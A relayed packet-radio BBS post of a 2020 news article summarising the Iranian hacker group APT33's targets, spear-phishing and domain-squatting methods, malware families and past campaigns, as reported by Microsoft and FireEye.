| |
HB1PMS > TECH 18.02.20 07:30l 93 Lines 4635 Bytes #999 (0) @ WW
BID : 2096HB1PMS
Read: DAE595 GAST
Subj: Dissecting Modus Operandi And Activities Of Infamo
Path: DBO595<DBX320<FRB024<NL3TD<NL3PRC<GY1BBS<HB1BBS
Sent: 200217/1916Z 8395@HB1BBS.ZL.NLD.EU BPQ6.0.19
Van: HB1PMS@HB1BBS.ZL.NLD.EU
Dissecting Modus Operandi And Activities Of Infamous Iranian Hacker Group
APT33
February 16, 2020 | Threat Actors
anonymous,asia,attack,botnet,business,card,code,computer,cracker,credit,crim
e,criminal,cyber,danger,data,encryption,espionage,firewall,fraud,hacker,hack
ing,identity,illegal,information,internet,keylogger,laptop,malware,network,p
assword,phishing,privacy,programmer,protect,protection,safety,secret,secure,
security,spam,spy,spyware,steal,stealing,technology,theft,thief,threat,troja
n,virus
The Holmium threat actor group has been active since at least 2013.
They target firms specifically located in the US, Saudi Arabia, and South
Korea.
In its recent report, Microsoft has revealed that the infamous APT33, also
known as Holmium or Magnallium cybercriminal group, stole data from about
200 companies in the past two years. These Iranian hackers penetrated into
systems, businesses, and governments and have caused hundreds of millions of
dollars in damages. The Holmium threat actor group has been active since at
least 2013.
Primary targets: The Holmium threat actor group has targeted organizations
spanning across different sectors. They targeted firms specifically located
in the US, Saudi Arabia, and South Korea. Lately, the group has shifted its
focus on the aviation firms that are involved in both military and
commercial capacities. It is also targeting those organizations that are
tied to petrochemical production.
Modus operandi: The APT33 primarily relies on spear-phishing emails to
conduct a majority of its attacks. These emails include URLs that are linked
to some specific files (such as .hta). Once the user clicks on the URL, it
downloads the malware, thus initiating the infection process.
The cybercriminal group also uses a range of malware in its different attack
campaigns. This includes SHAPESHIFT, DROPSHOT, TURNEDUP, NANOCORE, NETWIRE,
and ALFA Shell. The group also leverages popular Iranian hacker tools and
DNS servers for its attack campaigns.
Examples:
? From mid-2016 to early 2017, the Magnallium threat actor group compromised
a US firm in the aerospace sector and targeted a business group located in
Saudi Arabia.
? At the same time, it also targeted a South Korean company doing business
in oil refining and petrochemicals.
? In May 2017, it targeted a Saudi organization and a South Korean business
by using a fake job phishing campaign. The hacker group enticed victims with
job vacancies for a Saudi Arabian petrochemical company.
? In one incident, APT33 used the domain squatting technique to target
various organizations in Saudi Arabia. It registered multiple domains that
masquerade as Saudi Arabian aviation companies and Western organizations and
tricked victims to provided training, maintenance and support for Saudi’s
military and commercial fleet. The following domains masquerade as these
organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation
Arabia (NGAAKSA), and Vinnell Arabia, noted FireEye.
? The group was also responsible for the attacks involving Shamoon data-
wiper malware last year. The malware was used to target industrial players
in the Middle East and Europe.
Conclusion: Given the type of malware and attack techniques used, experts
believed that the group is slowly expanding its operation to other
countries.
“Its aggressive use of the tools, combined with shifting geopolitics,
underscores the danger that APT33 poses to governments and commercial
interests in the Middle East and throughout the world. Identifying this
group and its destructive capability presents an opportunity for
organizations to detect and deal with related threats proactively," FireEye
explained.
73 Henk.
======================================================================
_ _ ____ __ ____ ____ _____
| | | | _ \/_ | _ \| _ \ / ____| SYS: Henk (hb1nos@hb1bbs.com)
| |__| | |_) || | |_) | |_) | (___ QTH: Ouwerkerk - JO11XO
| __ | _ < | | _ <| _ < \___ \ BBS: HB1BBS.ZLD.NLD.EU
| | | | |_) || | |_) | |_) |____) | QRV: 27.235 MHz (FM 1200bps)
|_| |_|____/ |_|____/|____/|_____/ WEB: www.hb1bbs.com
======================================================================
** Host of BPQ Netrom/Node NLDHUB::NL9HUB 85.214.163.10 UDP 93
======================================================================
** This message is generated with Sally 7.2.033
----------------------------------------------------------------------
** Timed maandag 17 februari 2020 20:14 West-Europa (standaardtijd)
** BBS HB1PMS@HB1BBS.ZL.NLD.EU
Lese vorherige Mail | Lese naechste Mail
| |